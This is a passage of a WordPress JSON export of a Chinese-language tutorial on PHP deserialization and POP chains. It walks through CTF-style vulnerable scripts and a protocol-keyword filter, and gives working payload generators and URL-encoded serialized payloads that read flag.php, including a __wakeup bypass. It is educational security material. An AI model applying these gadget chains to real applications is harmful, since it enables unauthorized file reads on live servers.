    POP \u9762\u5411\u5c5e\u6027\u7f16\u7a0b(Property-Oriented Programing) \u5e38\u7528\u4e8e\u4e0a\u5c42\u8bed\u8a00\u6784\u9020\u7279\u5b9a\u8c03\u7528\u94fe\u7684\u65b9\u6cd5\uff0c\u4e0e\u4e8c\u8fdb\u5236\u5229\u7528\u4e2d\u7684\u9762\u5411\u8fd4\u56de\u7f16\u7a0b\uff08Return-Oriented Programing\uff09\u7684\u539f\u7406\u76f8\u4f3c\uff0c\u90fd\u662f\u4ece\u73b0\u6709\u8fd0\u884c\u73af\u5883<\/strong>\u4e2d\u5bfb\u627e\u4e00\u7cfb\u5217\u7684\u4ee3\u7801\u6216\u8005\u6307\u4ee4\u8c03\u7528\uff0c\u7136\u540e\u6839\u636e\u9700\u6c42\u6784\u6210\u4e00\u7ec4\u8fde\u7eed\u7684\u8c03\u7528\u94fe,\u6700\u7ec8\u8fbe\u5230\u653b\u51fb\u8005\u90aa\u6076\u7684\u76ee\u7684<\/p>\n
    \u8bf4\u7684\u518d\u5177\u4f53\u4e00\u70b9\u5c31\u662f ROP \u662f\u901a\u8fc7\u6808\u6ea2\u51fa\u5b9e\u73b0\u63a7\u5236\u6307\u4ee4\u7684\u6267\u884c\u6d41\u7a0b\uff0c\u800c\u6211\u4eec\u7684\u53cd\u5e8f\u5217\u5316\u662f\u901a\u8fc7\u63a7\u5236\u5bf9\u8c61\u7684\u5c5e\u6027\u4ece\u800c\u5b9e\u73b0\u63a7\u5236\u7a0b\u5e8f\u7684\u6267\u884c\u6d41\u7a0b\uff0c\u8fdb\u800c\u8fbe\u6210\u5229\u7528\u672c\u8eab\u65e0\u5bb3\u7684\u4ee3\u7801\u8fdb\u884c\u6709\u5bb3\u64cd\u4f5c\u7684\u76ee\u7684<\/p>\n
    POP\u94fedemo<\/h3>\n
    <?php\n\/\/flag is in flag.php\nerror_reporting(1);\nclass Read {\n    public $var;\n    public function file_get($value) {\n        $text = base64_encode(file_get_contents($value));\n        return $text;\n    }\n    public function __invoke(){\n        $content = $this->file_get($this->var);\n        echo $content;\n    }\n}\n\nclass Show {\n    public $source;\n    public $str;\n    public function __construct($file='index.php') {\n        $this->source = $file;\n        echo $this->source.' Welcome'."<br>";\n    }\n    public function __toString() {\n        return $this->str['str']->source;\n    }\n\n    public function _show() {\n        if(preg_match('\/gopher|http|ftp|https|dict|\\.\\.|flag|file\/i',$this->source)) {\n            die('hacker');\n        } else {\n            highlight_file($this->source); \n        }\n    }\n\n    public function __wakeup() {\n        if(preg_match("\/gopher|http|file|ftp|https|dict|\\.\\.\/i", $this->source)) {\n            echo "hacker";\n            $this->source = "index.php";\n        }\n    }\n}\n\nclass Test {\n    public $p;\n    public function __construct() {\n        $this->p = array();\n    }\n\n    public function __get($key) {\n        $function = $this->p;\n        return $function();\n    }\n}\n\nif(isset($_GET['hello'])) {\n    unserialize($_GET['hello']);\n} else {\n    $show = new Show('pop3.php');\n    $show->_show();\n}<\/code><\/pre>\n
    \u5bfb\u627ePOP\u94fe\u8fc7\u7a0b\uff1a<\/p>\n
      \n
    1. \u9996\u5148\u627e\u5230unserialize()<\/code>\uff0c\u53d1\u73b0\u91cc\u9762\u7684\u53c2\u6570\u53ef\u63a7\uff1b<\/li>\n
    2. \u63a5\u7740\u5bfb\u627e\u80fd\u591f\u5229\u7528\u7684\u9b54\u65b9\u65b9\u6cd5\uff0c\u4e00\u822c\u662f__wakeup()<\/code>\u6216\u8005__destruct()<\/code>\uff0c\u8fd9\u91cc\u53d1\u73b0Show\u7c7b\u91cc\u9762\u6709__wakeup()<\/code>\uff1b<\/li>\n
    3. __wakeup()<\/code>\u91cc\u9762\u4f7f\u7528\u4e86preg_match()<\/code>\u51fd\u6570\u5bf9\u4f20\u8fdb\u53bb\u7684\u53c2\u6570\u8fdb\u884c\u5b57\u7b26\u5339\u914d\uff0c\u8fd9\u91cc\u5982\u679c\u6211\u4eec\u4f20\u8fdb\u53bb\u7684\u53c2\u6570\u662f\u5bf9\u8c61\u7684\u65f6\u5019\uff0c\u5c31\u80fd\u591f\u89e6\u53d1__toString()<\/code>\u9b54\u6cd5\u65b9\u6cd5\uff1b<\/li>\n
    4. __toString()<\/code>\u65b9\u6cd5\u4e2d\u8bd5\u56fe\u83b7\u53d6\u5c5e\u6027$str<\/code>\u4e2d\u7684key\u4e3astr\u7684\u503c\uff0c\u5982\u679c\u6211\u4eec\u4f20\u8fdb\u53bb\u7684$str['str']<\/code>\u662f\u4e00\u4e2a\u7c7b\u5bf9\u8c61\u4e2d\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u65f6\uff0c\u5c31\u80fd\u591f\u89e6\u53d1__get()<\/code>\u9b54\u6cd5\u65b9\u6cd5\uff1b<\/li>\n
    5. \u63a5\u7740\u5bfb\u627e\u6709\u9b54\u6cd5\u65b9\u6cd5__get()<\/code>\u7684\u7c7b\uff0c\u53d1\u73b0Test\u7c7b\u91cc\u9762\u6709\u8fd9\u4e2a\u9b54\u6cd5\u65b9\u6cd5\uff1b<\/li>\n
    6. Test\u7c7b\u91cc\u9762\u7684__get()<\/code>\u65b9\u6cd5\u5bf9\u53c2\u6570$p<\/code>\u4f5c\u4e3a\u51fd\u6570\u540d\u5b57\u8fdb\u884c\u8c03\u7528\uff0c\u5982\u679c\u8fd9\u65f6\u5019\u7684$p<\/code>\u662f\u4e00\u4e2a\u7c7b\u5bf9\u8c61\u7684\u8bdd\uff0c\u5c31\u4f1a\u89e6\u53d1__invoke()<\/code>\u9b54\u6cd5\u65b9\u6cd5\uff1b<\/li>\n
    7. \u5bfb\u627e\u5b58\u5728\u9b54\u6cd5\u65b9\u6cd5__invoke()<\/code>\u7684\u7c7b\uff0c\u53d1\u73b0Read\u7c7b\u91cc\u9762\u6709\u8fd9\u4e2a\u9b54\u6cd5\u65b9\u6cd5\uff1b<\/li>\n
    8. Read\u7c7b\u91cc\u9762\u7684__invoke()<\/code>\u65b9\u6cd5\u4f1a\u8bfb\u53d6\u53c2\u6570$var<\/code>\u91cc\u9762\u7684\u5185\u5bb9\uff0c\u5e76\u8f93\u51fa\uff1b<\/li>\n<\/ol>\n
      class Read {\n    public $var = flag.php;\n}\n\nclass Show {\n    public $source;\n    public $str;\n}\n\nclass Test {\n    public $p;\n}\n\n$r = new Read();\n$s = new Show();\n$t = new Test();\n$t->p = $r;\n$s->str['str'] = $t;\n$s->source = $s;\necho urlencode(serialize($s));<\/code><\/pre>\n
      \u8f93\u51fa\uff1a<\/p>\n
      O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3Ba%3A1%3A%7Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A4%3A%22Read%22%3A1%3A%7Bs%3A3%3A%22var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D%7D<\/code><\/pre>\n
      \u8fd9\u91cc\u8fdb\u884cURL\u7f16\u7801\u7684\u539f\u56e0\u662f\u79c1\u6709\u548c\u4fdd\u62a4\u5c5e\u6027\u4f1a\u6709%00<\/code>\u5b57\u7b26\uff0c\u76f4\u63a5\u8f93\u51fa\u4f1a\u663e\u793a\u7a7a\u683c<\/p>\n
      \u51e0\u4e2a\u4f8b\u5b50<\/h2>\n
      \u7b2c\u4e00\u4e2a<\/strong><\/p>\n
      <?php\ninclude "flag.php";\n$unserialize_str = $_POST['data']; \n$data_unserialize = unserialize($unserialize_str); \nif($data_unserialize['user'] == 'admin' && $data_unserialize['pass']=='nicaicaikan') \n{     \n     print_r($flag); \n}\nelse{\n    highlight_file("index.php");\n} <\/code><\/pre>\n
      payload\uff1a<\/p>\n
      <?php \n    $demo=array(\n        "user"=>"admin",\n        "pass"=>"nicaicaikan"\n    );\n    $data = serialize($demo);\n    echo $data\n?>\n\/\/\u83b7\u5f97\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\na:2:{s:4:"user";s:5:"admin";s:4:"pass";s:11:"nicaicaikan";}<\/code><\/pre>\n
      \u5f97\u5230flag<\/code><\/p>\n
      \"image-20220408152139375\"<\/p>\n
      \u7b2c\u4e8c\u4e2a<\/strong><\/p>\n
      <?php\ninclude "flag.php";\nclass Index{\n    private $name1;\n    private $name2;\n    protected $age1;\n    protected $age2;\n\n    function getflag($flag){\n        $name2 = rand(0,999999999); \/\/ \u5b9a\u4e49\u4e00\u4e2a\u4ee5name2\u4e3a\u540d\u7684\u53d8\u91cf\uff0c\u6ce8\u610f\u4e0e\u8be5\u7c7b\u7684\u79c1\u6709\u5c5e\u6027name2\u65e0\u5173\n        if($this->name1 === $this->name2){\n            \/\/ \u5224\u65ad\u8be5\u7c7b\u7684\u4e24\u4e2a\u79c1\u6709\u5c5e\u6027\u662f\u5426\u5168\u7b49\uff0c\u5148\u5224\u65ad\u7c7b\u578b\u540e\u5224\u65ad\u6570\u503c\n            $age2 = rand(0,999999999);\n            if($this->age1 === $this->age2){\n                echo $flag;\/\/ \u82e5\u8be5\u7c7b\u7684\u79c1\u6709\u5c5e\u6027\u5168\u7b49\uff0c\u4fdd\u62a4\u5c5e\u6027\u5168\u7b49\uff0c\u5219\u8bfb\u53d6flag.php\u9875\u9762\u6e90\u7801\n            }\n        }\n        else{\n            echo "nonono";\n        }\n    }\n}\nif(isset($_GET['poc'])){\n    $a = unserialize($_GET['poc']);\n    $a->getflag($flag);\n}\nelse{\n    highlight_file("index.php");\n}\n?> <\/code><\/pre>\n
      payload\uff1a<\/p>\n
      <?php \n    class Index {\n        private $name1='daniel';\n        private $name2='daniel';\n        protected $age1=22;\n        protected $age2=22;\n    }\n\n    $index = new Index();\n    $data = serialize($index);\n    echo $data\n?>\n\/\/\u5f97\u5230\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\nO:5:"Index":4:{s:12:"Indexname1";s:6:"daniel";s:12:"Indexname2";s:6:"daniel";s:7:"*age1";i:22;s:7:"*age2";i:22;}\n\/\/\u4f46\u662f\u65e0\u6cd5\u5f97\u5230\u7ed3\u679c\uff0c\u539f\u56e0\u662f\u79c1\u6709\u548c\u4fdd\u62a4\u5c5e\u6027\u4f1a\u6709`%00`\u5b57\u7b26\uff0c\u76f4\u63a5\u8f93\u51fa\u4f1a\u663e\u793a\u7a7a\u683c\uff0c\u6240\u4ee5\u8981\u8fdb\u884curl\u7f16\u7801\n<?php \n    class Index {\n        private $name1='daniel';\n        private $name2='daniel';\n        protected $age1=22;\n        protected $age2=22;\n    }\n\n    $index = new Index();\n    $data = urlencode(serialize($index));\n    echo $data\n?>\n\/\/\u5f97\u5230\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\nO%3A5%3A%22Index%22%3A4%3A%7Bs%3A12%3A%22%00Index%00name1%22%3Bs%3A6%3A%22daniel%22%3Bs%3A12%3A%22%00Index%00name2%22%3Bs%3A6%3A%22daniel%22%3Bs%3A7%3A%22%00%2A%00age1%22%3Bi%3A22%3Bs%3A7%3A%22%00%2A%00age2%22%3Bi%3A22%3B%7D<\/code><\/pre>\n
      \"image-20220408154917374\"<\/p>\n
      \u7b2c\u4e09\u4e2a<\/strong><\/p>\n
      <?php\n\nclass DemoX{\n    protected $user;\n    protected $sex;\n    function __construct(){ \/\/\u6bcf\u6b21\u521b\u5efa\u65b0\u5bf9\u8c61\u65f6\u8c03\u7528\n        $this->user = "guest";\n        $this->sex = "male";\n    }\n\n    function __wakeup(){    \/\/\u5728\u4f7f\u7528 unserialize() \u524d\u8c03\u7528\n        $this->user = "Guest";\n        $this->sex = "female";\n    }\n\n    function __toString(){  \/\/\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32\u65f6\u8be5\u5982\u4f55\u5904\u7406\n        return "<br>you are " . $this->user . ", your sex is " . $this->sex . "<br>";\n    }\n\n    function __destruct()   \/\/\u5728\u5230\u67d0\u4e2a\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u90fd\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c\n    {\n        echo $this;\n    }\n}\n\nclass Demo2{\n    private $fffl4g;\n\n    function __construct($file){\n        $this->fffl4g = $file;\n    }\n\n    function __toString(){\n        return file_get_contents($this->fffl4g);\n    }\n}\n\nif(!isset($_GET['poc'])){\n    highlight_file("index.php");\n}\nelse{\n    $user = unserialize($_GET['poc']);\n} <\/code><\/pre>\n
        \n
      1. \u53cd\u5e8f\u5217\u5316\u4e4b\u540e\u4f1a\u5148\u8c03\u7528__wakeup<\/code>\uff0c\u5c5e\u6027\u503c\u9700\u8981\u81ea\u5df1\u638c\u63a7\uff0c\u9700\u8981\u5bf9__wakeup<\/code>\u8fdb\u884c\u7ed5\u8fc7\uff08\u8ba9\u5c5e\u6027\u503c\u5927\u4e8e\u771f\u5b9e\u503c\uff09<\/li>\n
      2. \u4e4b\u540e\u8c03\u7528__destruct<\/code>\u51fd\u6570\uff0c\u8f93\u51fa$this\u76f8\u5f53\u4e8e\u8f93\u51fa\u672c\u5bf9\u8c61\uff0c\u5c31\u662f\u628a\u672c\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528,\u8fd9\u65f6\u8c03\u7528__tostring<\/code>\u51fd\u6570<\/li>\n
      3. __tostring<\/code>\u51fd\u6570\u6709\u76f8\u5f53\u4e8e\u8fd4\u56de\u8f93\u51fa\u5c5e\u6027\uff0c\u5982\u679c\u5c5e\u6027\u662f\u5bf9\u8c61\u4f1a\u8c03\u7528\u8be5\u5bf9\u8c61\u7684__tostring<\/code>\u51fd\u6570<\/li>\n
      4. \u7b2c\u4e00\u4e2a\u7c7b\u4e2d\u8c03\u7528__tostring<\/code>\u65f6\uff0c\u5982\u679c\u5c06\u5176\u4e2d\u4e00\u4e2a\u5c5e\u6027\u8bbe\u7f6e\u4e3a\u5bf9\u8c61\u5219\u4f1a\u8c03\u7528Demo\u4e2d\u7684__construct<\/code>\u540e\u8c03\u7528__tostring<\/code><\/li>\n<\/ol>\n
        payload:<\/p>\n
        <?php\n\nclass DemoX{\n    protected $user;\n    protected $sex;\n    function __construct(){ \/\/\u6bcf\u6b21\u521b\u5efa\u65b0\u5bf9\u8c61\u65f6\u8c03\u7528\n        $this->user = new Demo2('flag.php');\n        $this->sex = "xxx";\n    }\n}\n\nclass Demo2{\n    private $fffl4g;\n    function __construct($file){\n        $this->fffl4g = $file;\n    }\n}\n$user = new DemoX();\n$user = serialize($user);\necho $user . "<hr>";\necho urlencode($user);\n$a = urlencode($user);\n?>\n\/\/\u5f97\u5230\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\uff08\u8fd9\u91cc\u662f\u8fdb\u884c\u7ed5\u8fc7__wakeup()\u4e4b\u540e\u7684\uff09\nO%3A5%3A%22DemoX%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00user%22%3BO%3A5%3A%22Demo2%22%3A1%3A%7Bs%3A13%3A%22%00Demo2%00fffl4g%22%3Bs%3A8%3A%22flag.php%22%3B%7Ds%3A6%3A%22%00%2A%00sex%22%3Bs%3A3%3A%22xxx%22%3B%7D<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
        \u6982\u5ff5\u548c\u57fa\u7840\u77e5\u8bc6 \u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316 \u5e8f\u5217\u5316\u5c31\u662f\u5c06\u4e00\u4e2a\u5bf9\u8c61\u8f6c\u6362\u6210\u5b57\u7b26\u4e32\u3002\u5b57\u7b26\u4e32\u5305\u62ec\uff0c\u5c5e\u6027\u540d\uff0c\u5c5e\u6027\u503c\uff0c\u5c5e\u6027\u7c7b\u578b\u548c\u8be5\u5bf9\u8c61\u5bf9\u5e94\u7684\u7c7b\u540d \u53cd\u5e8f\u5217 …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-218","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/218","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=218"}],"version-history":[{"count":2,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/218\/revisions"}],"predecessor-version":[{"id":220,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/218\/revisions\/220"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=218"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}